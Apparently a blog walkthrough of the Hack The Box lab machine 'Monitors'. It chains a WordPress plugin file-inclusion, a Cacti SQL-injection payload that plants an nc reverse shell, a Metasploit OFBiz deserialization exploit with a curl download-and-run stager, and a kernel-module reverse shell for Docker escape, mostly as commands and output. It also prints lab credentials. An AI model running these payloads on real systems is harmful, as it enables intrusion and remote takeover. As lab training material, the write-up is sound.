Hack-The-Box-walkthrough[Monitors]

Posted on Edited on In Views: Word count in article: 3.1k Reading time ≈ 11 mins.

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 24 Apr 2021
IP: 10.10.10.238

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# nmap -sV -p- -v --min-rate=10000 10.10.10.238
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s start with port-80

Port-80

There is a simple html page that said direct IP is not allowed.

Let’s add monitors.htb inside /etc/hosts file.

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# cat /etc/hosts                                                                                                                                
127.0.0.1          localhost server.fatty.htb
127.0.1.1          kali
10.10.10.238       monitors.htb


# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Now let’s go to monitors.htb now.

Wordpress is running on the server let’s run wpscan for find some users and vulnerabilities in plugin-ins.

1
2
3
4
5
6
7
8
9
10
[+] wp-with-spritz
 | Location: http://monitors.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

Let’s search on google for exploit for this plugin-in.

  • WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
1
2
3
4
Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

Let’s go to this url and check this is vulnerable through LFI or not.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
\_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false

Now we known we can list the files so let’s get the wp-config.php.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../var/www/wordpress/wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Got the username and password now let’s try to login with this creads.

We can’t login with these creads. Now let’s try to get /var/log/apache2/access.log.

But we don’t have permission to list the access.log.

After that i found an another way to list the access.log.

  • BugBounty — “Journey from LFI to RCE!!!”-How I was able to get the same in one of the India’s popular property buy/sell company.

After reading,the article I came to know that “/proc/self/fd” provides symbolic shortcut to access-logs and various other system related file. So I tried reading those in search for access logs-

I use burp for that.

Capture the req and send it to intruder.

  • request:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../proc/self/fd/1 HTTP/1.1

Host: monitors.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Add the position.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../proc/self/fd/§1§ HTTP/1.1

Host: monitors.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Select payload type to numbers from 1 to 15 and start the attack.

Check the maximum lenght on 10 payload.

Now we list the access.log file let’s open this in browser.

After analyze the file we see that a new vhost.

Let’s check the /etc/apache2/sites-available/000-default.conf file for conform that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../etc/apache2/sites-available/000-default.conf"
# Default virtual host settings
# Add monitors.htb.conf
# Add cacti-admin.monitors.htb.conf

<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin admin@monitors.htb
        DocumentRoot /var/www/html
        Redirect 403 /
        ErrorDocument 403 "Sorry, direct IP access is not allowed. <br><br>If you are having issues accessing the site then contact the website administrator: admin@monitors.htb"
        UseCanonicalName Off
        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Found a new vhost called cacti-admin.monitors.htb.

Let’s add this in /etc/hosts file.

Now let’s go to cacti-admin.monitors.htb.

Got the login page let’s login with wordpress creads which we find in wp-config.php.

Username : admin
Password : BestAdministrator@2020!

We got login succesfully and we are inside cacti admin panel let’s check the cacti version.

1
version : 1.2.12

Let’s check on google for some exploit for that specific version.

1
cacti 1.2.12 exploit poc

Find a github issue.

  • SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)

There is an sql injection on the latest version (in the /cacti/color.php page on the parameter filter.

And the application accept stacked queries, this can easy lead to remote code execution by replacing the path_php_binary setting inside the database.

Let’s try this to get rev shell.

1
http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/aa%3bmkfifo+/tmp/aa%3bcat+/tmp/aa|/bin/sh+-i+2%3E%261|nc+10.10.14.3+9001+%3E/tmp/aa;%27+where+name=%27path_php_binary%27;--+-

Hit this rev shell and you got a file leave this file and hit the second url.

Before hit the second url start your netcat listner on 9001.

1
http://cacti-admin.monitors.htb/cacti/host.php?action=reindex

The page is reloading. let’s check the netcat listner.

Got the reverse shell as www-data.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/monitors]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.238.
Ncat: Connection from 10.10.10.238:52046.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Now we need marcus user access so i use grep command to searching string “marcus” related file on every directory.

I found an interesting file called cacti-backup.service.

It’s point us to /home/marcus/.backup/backup.sh and when we cat that file we found the password for marcus.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ grep 'marcus' /etc -R 2>/dev/null
/etc/group-:marcus:x:1000:
/etc/subgid:marcus:165536:65536
/etc/group:marcus:x:1000:
/etc/passwd:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:marcus:165536:65536
/etc/passwd-:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
$ cd /etc/systemd/system/
$ cat cacti-backup.service
[Unit]
Description=Cacti Backup Service
After=network.target

[Service]
Type=oneshot
User=www-data
ExecStart=/home/marcus/.backup/backup.sh

[Install]
WantedBy=multi-user.target
$ cat /home/marcus/.backup/backup.sh
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

Let’s login with marcus with ssh and get our user.txt file.

1
2
3
4
5
6
marcus@monitors:~$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
marcus@monitors:~$ whoami
marcus
marcus@monitors:~$ cat user.txt
1e3139a8fb55977c78625b57f5c97c4e

Privilege escalation

let’s check services running on server.

1
2
3
4
5
6
7
8
9
10
11
12
marcus@monitors:~$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0     36 10.10.10.238:22         10.10.14.3:59860        ESTABLISHED
tcp        0      0 10.10.10.238:52046      10.10.14.3:9001         CLOSE_WAIT 
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       1      0 10.10.10.238:80         10.10.14.3:34042        CLOSE_WAIT

We find a interesting port called 8443. let’s check on google for this service.

It’s a https port let’s forward the port becuase it’s running locally we can’t access it directly.

1
ssh -L 8443:127.0.0.1:8443 marcus@10.10.10.238

Now let’s check on browser what service running on the web.

It’s running Apache Tomcat/9.0.31. let’s check on google for some exploit.

  • Apache OFBiz XML-RPC Java Deserialization

Now let’s run the msfconsole and configure that.

1
2
3
4
5
6
7
8
9
10
11
12
13
msf6 > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.3
lhost => 10.10.14.3
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001
lport => 9001
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true
forceexploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run

[*] Started reverse TCP handler on 10.10.14.3:9001 
[*] Executing automatic check (disable AutoCheck to override)
[!] The target is not exploitable. Target cannot deserialize arbitrary data. ForceExploit is enabled, proceeding with exploitation.
[*] Executing Linux Dropper for linux/x64/shell/reverse_tcp
[*] Using URL: http://0.0.0.0:8088/xFKYmWzlLi853C
[*] Local IP: http://192.168.177.128:8088/xFKYmWzlLi853C
[+] Successfully executed command: curl -so /tmp/uTbDdZRj http://10.10.14.3:8088/xFKYmWzlLi853C;chmod +x /tmp/uTbDdZRj;/tmp/uTbDdZRj;rm -f /tmp/uTbDdZRj
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Client 10.10.10.238 (curl/7.64.0) requested /xFKYmWzlLi853C
[*] Sending payload to 10.10.10.238 (curl/7.64.0)
[*] Sending stage (38 bytes) to 10.10.10.238
[*] Command shell session 1 opened (10.10.14.3:9001 -> 10.10.10.238:60830) at 2021-05-01 04:58:09 -0400
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
pwd
/usr/src/apache-ofbiz-17.12.01

We are root but in the docker container.

Now let’s run linpeas.

Let’s check on google for Abusing capability.

  • Docker Container Breakout: Abusing SYS_MODULE capability!

Checking the capabilities provided to the docker container

1
2
3
4
5
6
7
8
9
10
11
root@531ea6f91c39:/usr/src/apache-ofbiz-17.12.01# capsh --print
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

Let’s check the ip of docker0 interface inside marcus ssh shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
marcus@monitors:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:67:57 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.238/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:6757/64 scope global dynamic mngtmpaddr 
       valid_lft 86280sec preferred_lft 14280sec
    inet6 fe80::250:56ff:feb9:6757/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:27:57:47:01 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:27ff:fe57:4701/64 scope link 
       valid_lft forever preferred_lft forever
4: br-968a1c1855aa: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:6c:c5:00:44 brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-968a1c1855aa
       valid_lft forever preferred_lft forever
6: veth8849a36@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether ee:80:6e:96:12:95 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::ec80:6eff:fe96:1295/64 scope link 
       valid_lft forever preferred_lft forever

Now we need to create two files

1 -> reverse-shell.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.1/4443 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

2 -> Makefile

1
2
3
4
5
obj-m +=reverse-shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Now in docker root shell on /root directory wget the two files inside /root directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@531ea6f91c39:/root# wget http://10.10.14.3:88/reverse-shell.c
wget http://10.10.14.3:88/reverse-shell.c
--2021-05-01 09:40:30--  http://10.10.14.3:88/reverse-shell.c
Connecting to 10.10.14.3:88... connected.
HTTP request sent, awaiting response... 200 OK
Length: 616 [text/plain]
Saving to: 'reverse-shell.c'

reverse-shell.c     100%[===================>]     616  --.-KB/s    in 0s      

2021-05-01 09:40:30 (60.4 MB/s) - 'reverse-shell.c' saved [616/616]

root@531ea6f91c39:/root# wget http://10.10.14.3:88/Makefile
wget http://10.10.14.3:88/Makefile
--2021-05-01 09:41:04--  http://10.10.14.3:88/Makefile
Connecting to 10.10.14.3:88... connected.
HTTP request sent, awaiting response... 200 OK
Length: 160 [application/octet-stream]
Saving to: 'Makefile'

Makefile            100%[===================>]     160  --.-KB/s    in 0s      

2021-05-01 09:41:05 (23.8 MB/s) - 'Makefile' saved [160/160]

Now export the path and compile the program and you got so many files but we need only reverse-shell.ko

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@531ea6f91c39:/root# ls
ls
Makefile  reverse-shell.c
root@531ea6f91c39:/root# export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/8/
export PATH=$PATH/usr/lib/gcc/x86_64-linux-gnu/8/
root@531ea6f91c39:/root# make clean
make clean
make -C /lib/modules/4.15.0-142-generic/build M=/root clean
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
root@531ea6f91c39:/root# make all
make all
make -C /lib/modules/4.15.0-142-generic/build M=/root modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /root/reverse-shell.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/reverse-shell.mod.o
  LD [M]  /root/reverse-shell.ko
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
root@531ea6f91c39:/root# ls
ls
Makefile        modules.order    reverse-shell.ko     reverse-shell.mod.o
Module.symvers  reverse-shell.c  reverse-shell.mod.c  reverse-shell.o

Before insert the kernel module start your netcat listner on marcus ssh shell.

1
2
marcus@monitors:~$ nc -lnvp 4443
Listening on [0.0.0.0] (family 0, port 4443)

Now let’s insert the kernel module using insmod.

1
2
root@531ea6f91c39:/root# insmod reverse-shell.ko
insmod reverse-shell.ko

Now let’s check our netcat listner.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
marcus@monitors:~$ nc -lnvp 4443
Listening on [0.0.0.0] (family 0, port 4443)

Connection from 10.10.10.238 41538 received!
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@monitors:/# 
root@monitors:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@monitors:/# whoami
whoami
root
root@monitors:/# cat /root/root.txt
cat /root/root.txt
a58bf869665a6b00d8d31d195d2af59b

Summary of knowledge

  • WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
  • use /proc/self/fd from LFI to RCE
  • SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)
  • Apache OFBiz XML-RPC Java Deserialization
  • privesc via Abusing SYS_MODULE capability

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…